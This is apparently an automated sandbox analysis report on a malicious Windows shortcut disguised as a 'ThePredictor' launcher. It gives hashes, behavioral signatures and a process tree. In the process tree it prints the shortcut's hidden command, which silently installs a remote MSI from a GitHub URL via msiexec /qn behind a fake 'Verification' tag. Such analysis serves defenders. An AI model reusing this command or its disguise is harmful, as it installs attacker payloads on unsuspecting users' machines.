Analysis
-
max time kernel
13s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
18-02-2025 14:43
Static task
static1
Behavioral task
behavioral1
Sample
ThePredictor7.3.8Launcher.tmp.lnk
Resource
win7-20241010-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
ThePredictor7.3.8Launcher.tmp.lnk
Resource
win10v2004-20250217-en
21 signatures
150 seconds
General
-
Target
ThePredictor7.3.8Launcher.tmp.lnk
-
Size
1KB
-
MD5
63b4ae48bfc52db08f3ad1008acff185
-
SHA1
a2affc5d7b5211f97142c0def7ad9c430119e0b2
-
SHA256
420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f
-
SHA512
0c9fafdc316375aa4fd046a3ce485346c179d85092971707b1c61e57022a15e350a06f7f27faa3c9c110540f4161ed20b274f35b5cd4579df8d98f8387e85b4b
Score
7/10
Malware Config
Signatures
-
Use of msiexec (install) with remote resource 1 IoCs
pid Process 3036 msiexec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2920 msiexec.exe 6 2920 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3036 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 3036 msiexec.exe Token: SeIncreaseQuotaPrivilege 3036 msiexec.exe Token: SeRestorePrivilege 2920 msiexec.exe Token: SeTakeOwnershipPrivilege 2920 msiexec.exe Token: SeSecurityPrivilege 2920 msiexec.exe Token: SeCreateTokenPrivilege 3036 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3036 msiexec.exe Token: SeLockMemoryPrivilege 3036 msiexec.exe Token: SeIncreaseQuotaPrivilege 3036 msiexec.exe Token: SeMachineAccountPrivilege 3036 msiexec.exe Token: SeTcbPrivilege 3036 msiexec.exe Token: SeSecurityPrivilege 3036 msiexec.exe Token: SeTakeOwnershipPrivilege 3036 msiexec.exe Token: SeLoadDriverPrivilege 3036 msiexec.exe Token: SeSystemProfilePrivilege 3036 msiexec.exe Token: SeSystemtimePrivilege 3036 msiexec.exe Token: SeProfSingleProcessPrivilege 3036 msiexec.exe Token: SeIncBasePriorityPrivilege 3036 msiexec.exe Token: SeCreatePagefilePrivilege 3036 msiexec.exe Token: SeCreatePermanentPrivilege 3036 msiexec.exe Token: SeBackupPrivilege 3036 msiexec.exe Token: SeRestorePrivilege 3036 msiexec.exe Token: SeShutdownPrivilege 3036 msiexec.exe Token: SeDebugPrivilege 3036 msiexec.exe Token: SeAuditPrivilege 3036 msiexec.exe Token: SeSystemEnvironmentPrivilege 3036 msiexec.exe Token: SeChangeNotifyPrivilege 3036 msiexec.exe Token: SeRemoteShutdownPrivilege 3036 msiexec.exe Token: SeUndockPrivilege 3036 msiexec.exe Token: SeSyncAgentPrivilege 3036 msiexec.exe Token: SeEnableDelegationPrivilege 3036 msiexec.exe Token: SeManageVolumePrivilege 3036 msiexec.exe Token: SeImpersonatePrivilege 3036 msiexec.exe Token: SeCreateGlobalPrivilege 3036 msiexec.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2264 wrote to memory of 2888 2264 cmd.exe 30 PID 2264 wrote to memory of 2888 2264 cmd.exe 30 PID 2264 wrote to memory of 2888 2264 cmd.exe 30 PID 2888 wrote to memory of 3036 2888 cmd.exe 31 PID 2888 wrote to memory of 3036 2888 cmd.exe 31 PID 2888 wrote to memory of 3036 2888 cmd.exe 31 PID 2888 wrote to memory of 3036 2888 cmd.exe 31 PID 2888 wrote to memory of 3036 2888 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ThePredictor7.3.8Launcher.tmp.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c #Verification660703 & msiexec /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\system32\msiexec.exemsiexec /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn3⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2920